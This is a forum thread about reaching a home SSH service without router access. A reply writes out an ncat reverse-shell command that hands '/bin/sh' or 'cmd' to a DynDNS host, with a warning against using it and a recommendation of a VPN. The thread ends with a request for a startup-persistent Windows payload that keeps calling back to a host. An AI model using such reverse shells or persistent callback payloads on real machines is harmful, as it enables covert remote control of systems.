Jump to content

how to portforward without router


karencho
 Share

Recommended Posts

Hello i am using Windows 7 and i need to portforward several ports,but dont have no access to router username and password,so is there methods to do it without router,i have tried miniupnp it is not working giving me an errors ,so is there possibility to do it without router or miniupnp?

Link to comment
Share on other sites

https://www.google.ie/search?q=Port+forwarding+without+router+access&oq=Port+forwarding+without+router+access&aqs=chrome..69i57j0l5.4915j0j7&sourceid=chrome&ie=UTF-8

 

Seems like google can help, even a video setup that shows it without any programs. Though depending who is controlling your network, they may not be thrilled with you bypassing whatever setup they have.

Link to comment
Share on other sites

Skype uses Microsoft's servers, that you connect to and initiate the back channel the traffic goes over,no port forwarding needed. uTorrent pretty much same thing in calling out bound, but on older systems like XP, might require port forwarding to make it work but shouldn't be an issue. The torrent file takes care of the routing and addresses and at most you should only have to unblock it on your firewall. Other apps, or programs that sit for a service like an apache server, need to have port 80 or 443 forwarded to see the web server. This is because your machine is the host of the service, as where skype, Microsoft is the host of the service all your traffic runs through. Signing into skype, opens this connection, as where in example you have Apache on the home machine, an end users initiates the connection to you and has to get past NAT on your router to see the intended box behind your router on the LAN, which is why port forwarding is needed to tell which machine to route to.

Edited by digip
Link to comment
Share on other sites

Quote

so there is no way to portforward without access ,i guess that router has disable upnp function thats why i cant portforward with miniupnp

If upnp is disabled on the gateway(which it should be for security reasons) then no you can't use upnp to open the ports on the router. You'd need access to the router to look and see if that is the case, but port forwarding even without upnp will work, just have to do it manually from the router. Some routers may not even accept upnp settings by default and not have that functionality.

If it's on the local lan, you can use your box as a NAT point and forward to other machines on another lan segment or 2nd subnet you're the gateway for(example: if you have two network cards in 2 different subnets you are attached to, like a home only dev network that has no internet access at all without routing through your machine), but if you want something form the Internet to reach your machine then the main gateway at the edge of the network has to forward to you for someone from "outside" to reach you.

Local machine Port forwarding is at times normally used when doing attacks on boxes from the same network or MITM, Fake AP attacks, etc. Unless you're acting as a gateway for another machine, port fowarding on your machine alone doesn't do much. Where are you forwarding it to? For what purpose? Is your box in a DMZ? If it ism then your machine would accept all requests from the internet side, and you could then, port forward from your machine, but the whole point of that Gateway at the edge of the network, is to keep machines like yours from being accessible by any drive by attacks and by default, hiding you and dropping unsolicited traffic. Port forwarding on the gateway helps to allow services, such as a web server on one of the LAN machines, be reachable from the internet.

Edited by digip
Link to comment
Share on other sites

i need portforwarding for SSH access on wan,i dont want to use software like Teamviewer ......... SSh is perfect tool but i cant portforward so i can reach it in WAN,and thats it?i cant do anythig if i dont know password to my router? i have a  DSL connection by the way

Link to comment
Share on other sites

10 hours ago, karencho said:

i need portforwarding for SSH access on wan,i dont want to use software like Teamviewer ......... SSh is perfect tool but i cant portforward so i can reach it in WAN,and thats it?i cant do anythig if i dont know password to my router? i have a  DSL connection by the way

Hmm. I'll throw out a couple of ways you could get around this, but only one of them is really safe. Reverse shells(which anyone listening for could take over the system) and VPN.

You could in theory use SSH with a bounce and have the system initiate the call to you, but whatever device you want to connect to the home network, would need an address on the internet in front of NAT at the other end as well. You'd have to use something like DynDNS on the external box and setup a service on the internal machine to always dial out to the DynDNS address and port for your externally used device, and  then listen for the call, in a sense.

Not sure SSH could be used, but "ncat" that comes with nmap, can do SSL with the switch --ssl when connecting to another system. All you have to do, is setup a listener with "ncat --ssl -lvp 443" and on the home box do "ncat --ssl -v somedydndns.address.com 443 -e /bin/sh" or if on windows "-e cmd". 

The home machine would need to be scripted to continually try this every few minutes to dial to you, and once connected, keep the connection alive, and when dies, restart the calling home to your DynDNS address. This lets you move around anywhere, so long as you're using the DynDNS address on your remote device in some manner, and it will always call you. --- That said --- I advise you NOT to do this.

Reason being, this machine is returning a shell to the intended DynDNS address, but if someone else gets this address somehow, they could potentially be getting your shell as well. They would get your system's shell handed to them, but I wanted to show that it could be done to bypass NAT and the gateway without port fowarding.

You could probably setup your own script to handle authentication in some other manner than blatantly handing over a full shell, but not sure how you go about scripting that side of it, but sure it can be done, and there are probably scripts or tools that already do this, but I don't know what they are. 

The last thing, is a VPN. Most VPN protocols, are allowed on routers by default, ie: no port forwarding needed I believe for certain ports. I think port 500 and another one I can't remember off the top of my head, work for VPN passthrough by default on nearly all home routers, unless explicitly denied/disabled. A VPN would also be the safest way to do this and allow you to not just SSH into the home network, but if configured properly, safely tunnel all your traffic when on the road through your home connection, safeguarding your data when at say a free wifi cafe, your traffic would be encrypted if on a VPN. an HTTP socks proxy, will only safeguard the browser or programs configured for one, where as a VPN, tunnels all traffic over the VPN.

Link to comment
Share on other sites

can yo tell me is there payload that connects to single ip adress (The Host) until Host accepts connection?

 

so for example my ip address is 192.168.1.101 (HOST) and i create payload in python and run it on windows machine plus create service to run script evere time on windows start up,so is there possible to create payload that will install to windows machine so it will connect to ip adress 192.168.1.101 until the Host accepts connection there is no such payload?

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...